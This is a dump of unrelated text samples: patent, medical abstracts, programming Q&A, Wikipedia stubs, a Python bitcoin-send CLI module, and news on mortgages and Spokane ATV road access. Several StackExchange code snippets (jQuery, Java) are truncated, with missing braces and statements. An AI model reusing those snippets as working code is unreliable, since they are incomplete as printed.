Prior art means for maintaining foods at elevated temperatures include cartridges and canisters containing alcohol fuels such as methyl and ethyl alcohol;. Said alcohol fuels have relativley low flash points, typically in the range 54.degree. F. to 56.degree. F., which permit these fuels to be ignited directly by flame provided by a match or a candle. These types of prior art devices have several inherent drawbacks which create substantial problems for their users.
Most significant among the disadvantages to prior art devices are those encountered in the field of product safety. Utilization of methyl and ethyl alcohols creates a substantial hazard due to fire. This fact arises from the high volatility and low falsh point of these one and two carbon alcohols.
A second significant safety concern is that of noxious vapors. Those prior art devices utilizing methyl alcohol as their fuel present a substantial hazard with respect to methanol vapors. Said vapors are toxic and additionally can contaminate any food stored or located in the vicinity of these devices.
The third safety consideration is that of shipping. Prior art devices containing methanol and ethanol as their fuels have various restrictions placed upon them by those authorities regulating common carriers and other shippers. Thus, prior art devices are more expensive and inconvenient to transport due to the inherent hazards presented by their fuels.
Additionally, prior art devices present a disadvantage in that the range of heat developed by such devices is not easily adjustable. Most prior art devices is not easily adjustable. Most prior art devices utilize various mechanical means to adjust the oxygen flow available for combustion of the methanol and ethanol. This arrangement for control of heat is inadequate in many cases where a very low flame is required because the amount of oxygen required for low flame cannot be adequately regulated using prior art mechanical means thus causing the flame to be often spontaneously extinguished.
Therefore, it is desireable to provide a burner device for controllably heating and warming food and the like utilizing a new and unique, clean burning, high percentage glycol or glycol derivative fuel having a low vapor pressure and high flash point relative to commonly used fuels such as methanol and ethanol. Moreover, it is desirable that such a burner utilize a fuel which is nontoxic and produces a low level of nontoxic vapors. It is also desirable that such an improved heating device should have a continually adjustable flame by controlling the amount of fuel available for combustion.
While the prior art recognizes that glycol or glycol derivatives can be used as fuel additives; these additives are in minimal amounts (i.e. concentrations measured in parts per million) and are included to enhance the characteristics of the primary fuel component. In addition, glycol or glycol derivatives in substantial concentrations have never before been used, or suggested for use, as the primary fuel component.
Finally, it is desirable to provide a burner that is safe to ship and use and has minimal regulatory restrictions on shipment and storage relative to prior art devices. | {
"pile_set_name": "USPTO Backgrounds"
} |
Management of psoriasis with nutraceuticals: An update.
Psoriasis is a chronic skin disorder that speeds up the life cycle of skin cells, typically on the surface of the skin. Additional skin cells form thick scales and red fixes which are awfully itchy and sometimes painful. Although there are many therapeutic systems available to get symptomatic relief, unfortunately replete cure for psoriasis is not yet reported. Moreover, poor treatment outcomes as well as high toxicity profile of drugs makes these therapies more inconvenient to treat psoriasis. In search of alternative and complementary therapy for this disease, the focus has been shifted to nutraceuticals, few of them were reported since ages. It includes vitamins, herbal extracts, phytochemicals and dietary supplements. In this review, the attempt has been made to highlight key nutraceuticals for better management of psoriasis. Supplementation of appropriate nutraceutical may improve the quality of patient's life and have positive impact on overall state of disease. | {
"pile_set_name": "PubMed Abstracts"
} |
Loop through input fields with jQuery to find the highest value?
I have a number of input[type=text] fields on my page and I want to loop through all of them in order to find and return the highest value.
Is there a way to do this with jQuery?
Thanks for any help.
Here is one solution:
var highest = -Infinity;
$("input[type='text']").each(function() {
highest = Math.max(highest, parseFloat(this.value));
Here is another solution:
var highest = $("input[type='text']").map(function() {
return parseFloat(this.value);
Use Math.max function:
var nums = [];
$("input[type=text]").each( function() { nums.push( $(this).val() ); });
var max = Math.max.apply(Math, nums);
| {
"pile_set_name": "StackExchange"
} |
Drug interaction between valproic acid and meropenem: a case report.
Valproic acid and meropenam is commonly co-administrated in neurosurgical patients. Meropenem potentially decreases the valproic acid level, which may cause perioperative seizure. There has been no previous report of drug interaction between valproic acid and meropenem in Thailand. The authors report a patient who faced uncontrolled seizure after co-administrated valproic acid and meropenem. The level of valproic acid was assessed in different times after the administration of meropenem. Rapid decrease of valproic level was detected. However due to the administration of other antiepileptic agents, seizure did not develop. It is important for the physicians to recognize drug interaction between valproic acid and meropenem. Avoiding co-administration of both agents, valproic acid level monitoring and additive of other antiepileptic agents seem to be the appropriate solution. | {
"pile_set_name": "PubMed Abstracts"
} |
Plastic (disambiguation)
Plastic is a polymerized material. It may also refer to:
Science and technology
Plastic SCM, a distributed revision control tool
Plasticity (physics), a material that has high plasticity may be called plastic
Phenotypic plasticity, the ability of an organism to change its phenotype in response to changes in the environment
Arts, entertainment, and media
Plastic (2011 film), American horror film
Plastic (2014 film), a British crime film
Plastics (band) (1976–1981), a Japanese new wave band
Plastic (Mitsuki Aira album), 2009
Plastic (Joey Tafolla album), 2001
"Plastic" (song), a song by New Order from the album Music Complete
"Plastic (Spiderbait song)", a 1999 single by Australian alt-rock band, Spiderbait
"Plastic", a song by Prefuse 73 from the 2003 album One Word Extinguisher
"Plastic", a single by Alanis Morissette from the 1991 album Alanis
Plastic (comic book), a comic book series published by the American company Image Comics
Plastic arts, art forms involving physical manipulation of a plastic medium, such as sculpture or ceramics
Plastic.com, a community-driven message board
Other uses
Plastic, Polish video game developer most notable for Linger in Shadows
Plastic, a colloquial term for a credit card or debit card
See also
Plastique (disambiguation) | {
"pile_set_name": "Wikipedia (en)"
} |
HealthChoice Pharmacy Benefit
The member is responsible for the appropriate copay or the actual cost of the prescription; whichever is less, when a Network Pharmacy is utilized. Only the costs of generic medications are covered unless there is no generic equivalent available. If a generic medication is available, but the member requests the brand name equivalent, the member will be responsible for the copay amount plus the cost difference between the brand name medication and the generic equivalent. Some medications require prior authorization or may have quantity limits. Please contact the Pharmacy Benefits Manager, Medco at 1-800-903-8113, for information regarding quantity limits and to obtain prior authorization.
A list of preferred medications is included in the HealthChoice Select Medication List. A copy of this medication list is available on the provider website or you may request a list through the Provider Relations Division.
HealthChoice Select Medication List (HSML)
The HealthChoice Select Medication List is based on optimum therapy strategies and the evaluation of clinically equivalent medications. These evaluations are performed by the pharmaceutical consultant for OSEEGIB and the clinical staff of the pharmacy benefits manager. A list of preferred and non-preferred medications has been established and members obtain preferred medications (medications included on the Select Medication List) by paying the cost of the medication up to a $25 maximum if the cost of the medication is $100 or less. If the cost of the preferred medication is over $100, the member pays 25% of the cost up to a maximum of $50.
Members obtain non-preferred medications (medications not included on the Select Medication List) by paying the cost of the non-preferred medication up to a $50 maximum if the cost of the medication is $100 or less. If the cost of the non-preferred medication is greater than $100, the member pays 50% of the cost up to a maximum of $100.
HealthChoice is a generic mandatory Plan. If the member chooses a brand-name medication with generic alternatives, the member is required to pay the difference in cost between the generic and the brand-name medication.
Prior Authorization Process for Non-Preferred Medications
Prior authorization is required when a provider deems it necessary and appropriate to utilize a medication that is not contained in the Select Medication List. The prior authorization process is used to establish that a particular case meets clinically driven, medically relevant criteria before the medication is approved for coverage at the preferred rate.
The following process will be initiated for providers requesting prior authorization for a non-preferred medication at the preferred rate:
The provider’s office should contact Medco at 1-800-753-2851. Please have the Member ID number (Social Security Number) and the medication name and fax number ready to give to the Medco representative.
Medco will fax a prior authorization form to the provider’s office. This form should be completed at the provider’s office. Call Medco at 1-800-753-2851 to obtain the appropriate fax number.
The provider’s office will receive a fax from Medco which will supply notification of the review results.
If the medication is approved for coverage under the preferred rate, the approval is loaded into Medco’s system within 24 to 48 hours. Written notification of the approval is faxed to the provider’s office and sent to the member within 24 to 48 hours. If a non-preferred medication is not approved through the prior authorization process, written notification is also faxed to the provider and sent to the member within 24 to 48 hours. | {
"pile_set_name": "Pile-CC"
} |
Homebuyers undeterred by changes in mortgage landscape
Homebuyers undeterred by changes in mortgage landscape
Nov. 19, 2018
Though 2018 was not the best year for the mortgage landscape, Canadians remain hopeful about buying a home.
A new survey from mortgage rate comparison site Ratehub.ca survey found that, despite recent regulatory changes and interest rate hikes,71 per cent of current non-owners plan to buy a home in the future. And 59 per cent of prospective first-time homebuyers plan to purchase a home within the next two years.
This year saw a number of changes that affected the costs of ownership. In January, the mortgage stress test came into effect, which lowered affordability for Canadians with conventional mortgages by around 20 per cent, Ratehub.ca says. In addition, through 2018, the Bank of Canada announced three 25-basis-point interest rate hikes. (These increases are almost always immediately followed by mortgage rate hikes at Canada’s major banks.) Meanwhile, home prices in large cities continued to edge upwards.
Young Canadians most optimistic
Ratehub.ca, however, says younger Canadians remain the most optimistic about the prospect of homeownership, with Millennial and Generation Z Canadians leading the charge in homebuying intent. According to the survey, homeownership is a goal for:
87 per cent of Generation Zers
81 per cent of Millennials
64 per cent of Generation Xers
54 per cent of Baby Boomers
Canadians’ high intent to purchase is tempered by several possible homeownership hurdles. When first-time buyers were asked about their primary barrier to entering the housing market:
44 per cent cited insufficient down payment funds
17 per cent cited housing market uncertainty
12 per cent said their household income was too low to enter the housing market
9 per cent preferred to maintain housing flexibility
6 per cent said their credit score was too low to qualify for a mortgage
Many Canadians also expect home prices and mortgage rates to continue their upward trend in 2019. Among Canadians who plan on entering the housing market in 2019, 68 per cent believe mortgage rates will increase next year, while 58 per cent believe home prices will rise.
Better understanding needed
An eagerness to enter the housing market, however, hasn’t resulted in a better understanding of mortgage regulations amongst first-time homebuyers, Ratehub.ca says. Forty-seven per centof prospective first-time homebuyers are unaware of mortgage qualification rules that came into effect in 2018.
“The biggest hurdle for first-time homebuyers is saving up for a down payment,” says James Laird, co-founder of Ratehub Inc. and president of CanWise Financial. “While first-time buyers can take advantage of programs like the RRSP Home Buyers’ Plan which are tailored for their needs, buyers can also benefit from building a realistic savings plan to hit their goals.”
The Canadian Home Builders’ Association (CHBA) has named Bob Finnigan, partner at Herity (Heathwood Homes), CHBA Past President, member of BILD (GTA) and long-time building industry executive, as its Member of the Year.
Great Gulf and Tridel were among the big winners at the recent 39th Annual BILD Awards, as the Building Industry and Land Development Association (BILD) recognized the top builders and developers, projects and marketing initiatives in the industry.
Before you get the keys, you and your builder will do a Pre-Delivery Inspection or PDI. This is an important step – not only does it familiarize you with your new home but it also helps you protect your warranty rights.
With over 90 years of experience, BLANCO is the leading kitchen sinks and faucets manufacturer. From handcrafted in Germany Steelart® sinks and the beauty of Silgranit®, to the European design faucets, BLANCO products are celebrated worldwide for their unmatched quality and design. Blanco Silgranit® sinks are proudly manufactured in Canada TRADE ONLY.
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Tarion works hard every day to serve the public interest by, first and foremost, protecting consumers and their new home purchases. We serve new home buyers and new home owners by ensuring that one of their life’s biggest investments is protected. Almost every new home in the province is covered by a new home warranty. This warranty protection is provided by Ontario’s builders and lasts up to seven years.
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The purchase of a house is the largest investment we all make, and the kitchen is the biggest investment in the house. We are here to help you find appliances that make sense, give you great service, and most importantly give you the best price! | {
"pile_set_name": "Pile-CC"
} |
Historically pulmonary emphysema was described in 1834 by Laennec on the basis of observations made on the cut surface of postmortem human lungs being the lesion attributed to the atrophy of lung tissue from pulmonary hyperinflation.^([@B1])^ Hence, emphysema was redefined as a "abnormal and permanent dilation of distal air spaces of terminal bronchiole".^([@B2])^ In addition, evidences of destruction of alveolar wall and fibrosis must not be ignored in this disease pathogenesis.^([@B3])^
These anatomopathological changes result in loss of respiratory surface and blood irrigation, decrease of elastic recognition and pulmonary hyperexpansion, and it could also affect part of acinus or its structure.^([@B4])^
Pulmonary emphysema is caused by enzymatic imbalance between proteases and anti-proteases that results in destruction of the alveolar wall due to proteolytic enzymes action, which affects the extracellular matrix (ECM)^([@B5])^ and its component integrity especially the elastic fibres.^([@B6])^
Experimental model of pulmonary emphysema is based on nebulization or instillation of proteolytic enzyme, such as panain *(Carica papaya)*,^([@B7])^ porcine pancreatic elastase,^([@B4])^ and human neutrophil elastase.^([@B8])^ This proteolytic process, associated with uniform destruction of ECM of pulmonary acinus, ends up in morphohistological and physiological changes in lungs that resemble those changes find in emphysema in humans.^([@B9],[@B10])^
Dilatation of distal air spaces of terminal bronchiole ([Figure 1](#f01){ref-type="fig"}) and reduction of area occupied by elastic fibres ([Figure 2](#f02){ref-type="fig"}) evidenced histologically the pulmonary emphysema in experimental models that use porcine pancreatic elastase.
Figure 1Photomicrographs of lung parenchyma (hematoxylin-eosin) x 100 increased. (A) Naïve lung and (B) emphysematous lung showing hyperdistension of alveolar ducts associated with the rupture of alveolar septa
Figure 2Photomicrographs of lung parenchyma (Verhoeff), x 400 increased. Lung naïve showing integrity of elastic component of alveolar wall, opposing to areas revealed throughout septa associated with thickening of elastic fibres in alveolar wall and decreasing of proportion of elastic fibres in emphysematous lung (B)
Aprendendo Por Imagens
Características histopatológicas do enfisema pulmonar em modelo experimental
Antonio Di
Universidade de São Paulo, São Paulo, SP, Brasil.
Autor correspondente: Antonio Di Petta − Rua Rodolfo Marcos Teófilo, 49 − Freguesia do Ó -- CEP: 02862-100 − São Paulo, SP, Brasil − Tel.: (11) 3851-0028 − E-mail:
Historicamente, Laennec (1834) descreveu o enfisema pulmonar a partir de observações em cortes necroscópicos superficiais de pulmões humanos, atribuindo a lesão à atrofia do tecido pulmonar resultante da hiperinsuflação pulmonar.^([@B1])^ O enfisema foi, então, redefinido como uma "dilatação anormal e permanente dos espaços aéreos distais do bronquíolo terminal".^([@B2])^ Além do mais, a evidência da destruição da parede alveolar e de fibrose não deve ser ignorada na patogenia da doença.^([@B3])^
Essas alterações anatomopatológicas resultam na perda da superfície respiratória e de irrigação sanguínea, na diminuição do recolhimento elástico e na hiperexpansão pulmonar, podendo atingir parte do ácino ou toda sua estrutura.^([@B4])^
O enfisema pulmonar é obviamente uma doença causada pelo desequilíbrio enzimático existente entre proteases e antiproteases, resultando na destruição da parede alveolar ocasionada pela ação de enzimas proteolíticas, que degradam a matriz extracelular (MEC)^([@B5])^ e afetam a integridade de seus componentes, particularmente as fibras elástica.^([@B6])^
Modelos experimentais de enfisema pulmonar baseiam-se na nebulização ou instilação de enzimas proteolíticas, como papaína (*Carica papaya*),^([@B7])^ elastase pancreática de porco,^([@B4])^ e elastase neutrofílica humana.^([@B8])^ Esse processo proteolítico, associado à destruição uniforme da MEC do ácino pulmonar, resulta em alterações morfo-histológicas e fisiológicas dos pulmões equivalentes às alterações encontradas no enfisema em seres humanos.^([@B9],[@B10])^
A dilatação dos espaços aéreos distais do bronquíolo terminal ([Figura 1](#f03){ref-type="fig"}) e a redução da área ocupada pelas fibras elásticas ([Figura 2](#f04){ref-type="fig"}) evidenciam histologicamente o enfisema pulmonar em modelos experimentais instilados por elastase pancreática de porco.
Figura 1Fotomicrografias do parênquima pulmonar (hematoxilina-eosina), aumento x100. (A) Pulmão *naive* e (B) pulmão enfisematoso, demonstrando hiperdistensão dos ductos alveolares com ruptura dos septos alveolares
Figura 2Fotomicrografias do parênquima pulmonar (*Verhoeff*), aumento de 400x. (A) Pulmão *naive* demonstrando integridade dos componentes elásticos da parede alveolar, contrastando com áreas desnudas ao longo dos septos associadas ao adensamento de fibras elásticas na parede alveolar e diminuição da concentração de fibras elásticas no pulmão enfisematoso (B)
| {
"pile_set_name": "PubMed Central"
} |
Does grails needed to run the application on tomcat?
I'm very new to web development.
I see people running grails app on tomcat, without grails being installed in that system! How this can be possible? How come tomcat can understand "grails" terminology and semantics?
Am I missing anything over here?
Thanks in advance.
Everything the app needs is in the WAR file that you deploy, including the Grails JARs. Tomcat merely hosts the app. It doesn't need to know Grails terminology and semantics. By the time Tomcat knows about it, it's already been translated into the things it knows: HTTP, HTML, etc.
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"pile_set_name": "StackExchange"
} |
* /MathJax/jax/output/HTML-CSS/fonts/TeX/AMS/Regular/MiscSymbols.js
* Copyright (c) 2012 Design Science, Inc.
* Part of the MathJax library.
* See http://www.mathjax.org for details.
* Licensed under the Apache License, Version 2.0;
* you may not use this file except in compliance with the License.
* http://www.apache.org/licenses/LICENSE-2.0
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"pile_set_name": "Github"
} |
Kanhiya Nagar metro station
The Kanhiya Nagar Metro Station is located on the Red Line of the Delhi Metro.
Station layout
List of available ATM at Kanhiya Nagar metro station are
, ,
Kanhiya Nagar Metro station has the parking facility
See also
List of Delhi Metro stations
Transport in Delhi
Delhi Metro Rail Corporation
Delhi Suburban Railway
List of rapid transit systems in India
Delhi Transport Corporation
List of Metro Systems
External links
Delhi Metro Rail Corporation Ltd. (Official site)
Delhi Metro Annual Reports
UrbanRail.Net – descriptions of all metro systems in the world, each with a schematic map showing all stations.
Category:Delhi Metro stations
Category:Railway stations opened in 2004
Category:Railway stations in North West Delhi district | {
"pile_set_name": "Wikipedia (en)"
} |
Requesting the mentor regarding the PhD research topic selection
One of my friends is doing PhD under a good faculty from one year.
The mentor wants to give PhD only if the student writes two papers in SCI journals. The student wants to do his PhD on number theory conjectures. The mentor is saying that the PhD and groundbreaking research work are independent and hence the mentor saying my friend to work on small incremental work that will give papers quickly.
How to make it allowed to work under the same mentor (mentor is good enough and one year completed)?
It is a mistake for most students (Ramanujan excepted) to go against his or her advisor. I'm sure that the advisors complete thoughts are more complex than you present here, but probably involve the risk of taking on a big project as a student and ending up with nothing - no results and no degree. Some problems are hard and take years-decades-centuries to resolve.
The advisor is giving good advice and following it will put him or her on the side of the student.
If "your friend" wants to take on the big project there is no problem, but will be working from a stronger position by finishing the doctorate first.
Take the advice. It is the faster path to success.
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"pile_set_name": "StackExchange"
} |
Execution model
An execution model specifies how work takes place. Every programming language has an execution model, which is specified as part of the language specification, and is implemented as part of the language implementation. The details in the specification of an execution model cover things such as what is an indivisible unit of work, and what are the constraints on the order in which those units of work take place. For example, the addition operation is an indivisible unit of work in many languages, and in sequential languages such units of work are constrained to take place one after the other.
In particular, the C programming language, has a concept called a statement. The spec says that a statement is a chunk of syntax that is terminated by a ";". The language spec then says that execution of the program proceeds statement by statement, which tells us something about the execution model of the language. It tells us that statements are indivisible units of work and that they proceed in the same order as their syntactic appearance in the code (except when a control statement such as IF or WHILE modifies the order). By stating the order in which statements are executed, the language spec has stated constraints on the order of performing units of work. The C language actually has an additional level to its execution model, which is the order of precedence. It states the rules for the order of operations within a single statement. The order of precedence can be viewed as stating the constraints on performing the units of work that are within a single statement. So, ";" and "IF" and "WHILE" cover constraints on the order of statements, while order of precedence covers constraints on work within a statement. Hence, these parts of the C language specification are stating the execution model of the C language.
An implementation of an execution model controls the order in which work takes place during execution. This order may be chosen ahead of time, in some situations, or it can be dynamically determined as the execution proceeds. Most execution models allow varying degrees of both. For example, the C language fixes the order of work within a statement and it fixes the order of all statements, except ones that involve an IF statement or a form of loop statement. Hence, most of the order of execution may be chosen statically, before execution begins, but a small portion must be chosen dynamically, as execution proceeds.
The static choices are most often implemented inside a compiler, in which case the order of work is represented by the order in which instructions are placed into the executable binary. The dynamic choices would then be implemented inside the language's runtime system. The runtime system may be a library, which is called by instructions inserted by the compiler, or the runtime system may be embedded into the executable directly, such as by inserting branch instructions, which make dynamic choices about which work to perform next.
However, an interpreter may also be constructed for any language, in which case all decisions on order of execution are dynamic. An interpreter can be viewed as being part translator, and part execution model implementation.
Each and every programming language has an execution model, which determines the manner in which the units of work (that are indicated by program syntax) are scheduled for execution. Detailed examples of the specification of execution models of a few popular languages include those of Python,[1] the execution model of the Unified Parallel C (UPC) programming language, [2] a discussion of various classes of execution model such as for imperative versus functional languages,[3] and an article discussing execution models for real-time embedded languages.[4]
As a simple example of a basic execution model, that of the C language is described in the book by Kernighan and Richie.[5] The book describes that work takes places in units called statements, which are syntactically indicated by a terminating ";". It specifies that statements are completed serially (one at a time) and sequentially (a previous statement completes before the next statement begins). Details such as this are part of the execution model.
In the modern age, parallel programming is an increasingly important topic. Parallel execution models (several at a time) are much more complex. For example, the C++11 standard includes sizeable wording that deals with the parallel execution model of the language. | {
"pile_set_name": "Pile-CC"
} |
<http://example/s> <http://example/p> <http://example/o> .
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"pile_set_name": "Github"
} |
What is relational parametricity?
A complicated-sounding term with no good explanations from a simple google search... are there any more academically-oriented folk who could explain this one?
Both answers are mostly right. I would say that parametricity is a possible property of polymorphism. And polymorphism is parametric if polymorphic terms behave the same under all instantiations. To "behave the same" is a vague, intuitive term. Relational parametricity was introduced by John Reynolds as a mathematical formalization of this. It states that polymorphic terms preserve all relations, which intuitively forces it to behave the same:
Consider f: a list -> a list.
If we have the relation a~1, b~2, c~3, ..., then we can lift it to lists and hav e.g.
[a, d, b, c] ~ [1, 4, 2, 3]
Now, if f([a, d, b, c]) = [c, b, d, a] and f preserves relations,
then f([1, 4, 2, 3]) = [3, 2, 4, 1].
In other words, if f reverses list of strings, it also reverses lists of numbers.
So relationally parametric polymorphic functions cannot "inspect the type argument", in that they cannot alter their behaviour based on the type.
Relational parametricity seems to be the property that a function abstracted over types (like a generic in Java) can have. If it has this property, it means it never inspects its type argument or deconstructs it / uses it in some special way. For example, the function "id or inc" here is not relationally parametric:
public class Hey<T>
public T idOrInc(T var)
if (var instanceof Integer)
return (T)(new Integer(((Integer)var).intValue()+1));
return var;
public static void main(String[] args) {
Hey<Integer> h = new Hey<Integer>();
System.out.println(h.idOrInc(new Integer(10)));
Hey<Double> h2 = new Hey<Double>();
System.out.println(h2.idOrInc(new Double(10)));
The output is:
$ java Hey
| {
"pile_set_name": "StackExchange"
} |
""" Two1 command to send bitcoin to another address """
# standart python imports
import logging
# 3rd party imports
import click
# two1 imports
from two1.blockchain.exceptions import DataProviderError
from two1.wallet.exceptions import WalletBalanceError
from two1.commands.util import decorators
from two1.commands.util import uxstring
from two1.commands.util import exceptions
from two1.commands.util import currency
from two1.commands.util.bitcoin_computer import has_mining_chip
# Creates a ClickLogger
logger = logging.getLogger(__name__)
@click.argument('address', type=click.STRING)
@click.argument('amount', type=click.FLOAT)
@click.argument('denomination', default='', type=click.STRING)
@click.option('--use-unconfirmed', '-u',
help="Use unconfirmed transactions/UTXOs")
@click.option('--verbose', '-v', is_flag=True, default=False,
help="Show all transaction inputs and outputs.")
def send(ctx, address, amount, denomination, use_unconfirmed, verbose):
"""Send a specified address some satoshis.
Send 5000 satoshi from your on-chain balance to the Apache Foundation.
$ 21 send 1BtjAzWGLyAavUkbw3QsyzzNDKdtPXk95D 5000 satoshis
You can use the following denominations: satoshis, bitcoins, and USD.
By default, this command uses only confirmed transactions and
UTXOs to send coins. To use unconfirmed transactions, use the
--use-unconfirmed flag.
if denomination == '':
confirmed = click.confirm(uxstring.UxString.default_price_denomination, default=True)
if not confirmed:
raise exceptions.Two1Error(uxstring.UxString.cancel_command)
denomination = currency.Price.SAT
price = currency.Price(amount, denomination)
return _send(ctx.obj['wallet'], address, price.satoshis, verbose, use_unconfirmed)
def _send(wallet, address, satoshis, verbose, use_unconfirmed=False):
"""Send bitcoin to the specified address"""
txids = []
txids = wallet.send_to(address=address, amount=satoshis, use_unconfirmed=use_unconfirmed)
# For now there is only a single txn created, so assume it's 0
txid, txn = txids[0]["txid"], txids[0]["txn"]
if verbose:
logger.info(uxstring.UxString.send_success_verbose.format(satoshis, address, txid, txn))
logger.info(uxstring.UxString.send_success.format(satoshis, address, txid))
except ValueError as e:
# This will trigger if there's a below dust-limit output.
raise exceptions.Two1Error(str(e))
except WalletBalanceError as e:
if wallet.unconfirmed_balance() > satoshis:
raise exceptions.Two1Error(uxstring.UxString.send_insufficient_confirmed + str(e))
balance = min(wallet.confirmed_balance(), wallet.unconfirmed_balance())
if has_mining_chip():
raise exceptions.Two1Error(uxstring.UxString.send_insufficient_blockchain_21bc.format(
balance, satoshis, address, str(e)))
raise exceptions.Two1Error(uxstring.UxString.send_insufficient_blockchain_free.format(
balance, satoshis, address, str(e)))
except DataProviderError as e:
if "rejected" in str(e):
raise exceptions.Two1Error(uxstring.UxString.send_rejected)
raise exceptions.Two1Error(str(e))
return txids
| {
"pile_set_name": "Github"
} |
Field of the Invention
The present invention relates to an image processing apparatus which saves a print job transmitted from an information processing apparatus for each user, and a controlling method for the image processing apparatus.
Description of the Related Art
An MFP (multi function peripheral) which is equipped with an image reading device, a printing device and a communicating device and has image processing applications of copying, printing, scanned-image transmitting and the like has been known. Moreover, since security consciousness has increased recently, a great number of MFPs have user authentication functions respectively. In the MFP like this, inputs of a user name and a password are accepted as authentication information via a touch panel, and/or authentication information is read and obtained from a card by using a card authentication function. However, to input the user name, the password and the like from the touch panel on the MFP or to install the card authentication function is troublesome for a user who wishes to use the MFP immediately and promptly in the aspects of costs and operability. Moreover, in the situation that the authentication function has not been installed because sever security is not so required, there are users who cannot use a personalization function of the MFP because there is no authentication function and thus cannot have usability.
Japanese Patent Application Laid-Open No. 2012-254618 discloses, as the means for saving user's trouble and enabling a user to easily use the personalization function, the MFP which displays the icon image associated with the user on the screen, and by which the user only has to select the displayed own icon image for using the personalization function.
In the MFP disclosed in Japanese Patent Application Laid-Open No. 2012-254618, the user is automatically registered by using, as the user ID for identifying the user, the job owner name and the computer name added in the print data for which the printing has been instructed from a PC (personal computer). However, since the users work in various office environments, there is a case where, in a small-scale office environment, the domain is not used in the user authentication for the PC but the local authentication is used. On the contrary, it is supposed that, in a large-scale office environment, the domain is used in the user authentication for the PC. Further, there is an environment that one user owns a plurality of PCs in the same office and logs in to each PC via the user authentication using the domain. | {
"pile_set_name": "USPTO Backgrounds"
} |
I threw her nightstand bible under her bed So she wouldn't rethink the sitaution
"pile_set_name": "OpenWebText2"
} |
Penning ionization
Penning ionization is a form of chemi-ionization, an ionization process involving reactions between neutral atoms or molecules.
The Penning effect is put to practical use in applications such as gas-discharge neon lamps and fluorescent lamps, where the lamp is filled with a Penning mixture to improve the electrical characteristics of the lamps.
The process is named after the Dutch physicist Frans Michel Penning who first reported it in 1927. Penning started to work at the Philips Natuurkundig Laboratorium at Eindhoven to continue the investigation of electric discharge on rare gases. Later, he started measurements on the liberation of electrons from metal surfaces by positive ions and metastable atoms, and especially on the effects related to ionization by metastable atoms.
Penning ionization refers to the interaction between an electronically excited gas-phase atom G* and a target molecule M. The collision results in the ionization of the molecule yielding a cation M+., an electron e−, and a neutral gas molecule, G, in the ground state. Penning ionization occurs via formation of a high energy collision complex, evolving toward the formation of a cationic species, by ejecting a high energy electron.
{G^\ast} + M -> {M^{+\bullet}} + {e^-} + G
Penning ionization occurs when the target molecule has an ionization potential lower than the excited energy of the excited-state atom or molecule.
When the total electron excitation energy of colliding particles is sufficient, then the bonding energy of two particles that bonded together can also be contributed into the associative penning ionization act.
Associative Penning ionization can also occur:
{G^\ast} + M -> {MG^{+\bullet}} + e^-
Surface Penning ionization (Auger Deexcitation) refers to the interaction of the excited-state gas with a surface S, resulting in the release of an electron:
{G^\ast} + S -> {G} + {S} + e^-
The positive charge symbol S+ that would appear to be required for charge conservation is omitted, because S is a macroscopic surface and the loss of one electron has a negligible effect.
Electron spectroscopy
Penning ionization has been applied to Penning ionization electron spectroscopy (PIES)for gas chromatography detector in glow discharge by using the reaction for He or Ne. The kinetic energy of electron ejected is analyzed by the collisions between target (gas or solid) and metastable atoms by scanning the retarding field in a flight tube of the analyzer in the presence of a weak magnetic field. The electron produced by reaction has a kinetic energy E determined by:
The Penning ionization electron energy does not depend on the conditions of the experiments or any other species since both E and IE are atomic or molecular constants of the energy of He and the ionization energy for the species. Penning ionization electron spectroscopy applied to organic solids. It enables the study of local electron distribution of individual molecular orbitals, which exposes to the outside of the outermost surface layers.
Mass Spectrometry
Multiple mass spectrometric techniques, including glow discharge mass spectrometry and Direct Analysis in Real Time mass spectrometry rely on Penning ionization.
Glow discharge mass spectrometry is the direct determination of trace element in solid samples. It occurs with two ionization mechanisms: the direct electron impact ionization and Penning ionization. Processes inherent to the glow discharge, namely cathodic sputtering coupled with Penning ionization, yield an ion
population from which semi-quantitative results can be directly obtained.
See also
Chemical ionization
Category:Ion source
Category:Electron spectroscopy | {
"pile_set_name": "Wikipedia (en)"
} |
All-terrain vehicle enthusiasts are pushing to get more access to local roads, including roads in unincorporated Spokane County.
But Spokane County commissioners last week said they are initially reluctant to open county roads to ATVs, despite a new state law allowing it.
Lawmakers last spring approved ATVs on roads with speed limits of 35 mph or lower but gave control over the decision to local governments.
Rep. Matt Shea, R-Spokane Valley, was the prime sponsor of the bill.
The problem has been Washington’s “overly restrictive laws concerning the use of off-road vehicles and all-terrain vehicles,” Shea said in a news release when the bill passed in June.
The law was described as a compromise among ATV enthusiasts, conservationists and government.
The law sets up a licensing system for ATVs, intended to control illegal off-road use of the vehicles and prevent ATV thefts.
Licensed ATVs would need safety and other equipment, such as spark arrestors, to be allowed on regular roads.
Shea and ATV users said opening local roads to the vehicles would create tourist opportunities in rural areas where economies have been depressed over the years.
It would also create new, legal riding opportunities closer to home, said Bob Cahill, president of the Eastern Washington ATV Association.
“I think there are lots of roads that could be opened to ATVs in this county,” he said.
Cahill said he travels to other states to ride and has discovered the draw of ATVs provides economic stimulus in small communities outside of Washington.
Conservationists and landowners have been concerned over the years that some ATV riders tear up property and damage wetlands. Opening roads to legal riding also opens up opportunities to go off-road, conservationists said.
Mitch Friedman, executive director of Conservation Northwest, said the licensing requirements will create greater accountability for riders because violators can be identified through license numbers displayed on ATVs.
“It shouldn’t be everywhere,” he said of allowing ATVs on public roads, “but it should be in some places.”
Spokane County Engineer Bob Brueggeman told county commissioners last week he is opposed to opening Spokane County roads to ATVs because of damage riders might cause and because of increased maintenance that might be needed.
He said riders might go up and down ditches and embankments, causing erosion and other problems.
Commissioner Todd Mielke said the state gave itself an exemption from liability under the law but did not extend that exemption to local governments.
Cahill said he believes the concerns are overstated. ATV owners carry insurance to cover their liability, he said.
“Most people who are out there riding are very respectable people,” he said. “We are kind of self-policing.”
As an option, Cahill said, ATV enthusiasts would like to have routes designated for ATV use. The law provides that option, particularly on roads that connect ATV parks with small towns.
Riding ATVs is common in rural areas, Commissioner Shelly O’Quinn said. “There are areas around Spokane County that would benefit from this,” she said.
Auditor Vicky Dalton said ATV owners are calling her licensing department to find out when they can get their new plates. She said they will become available in March.
The map includes the Centennial Trail, a Cheney loop, Little Spokane River and Painted Rocks, Manito Park and Cannon Hill, a Medical Lake loop, a Riverfront Park to Gonzaga University loop and Riverside State Park.
Bridge work, more
• State highway officials said Trent Avenue will be reduced to a single lane westbound today through Thursday from 7 a.m. to 5:30 p.m. in the vicinity of the Sullivan Road overpass for bridge repair work.
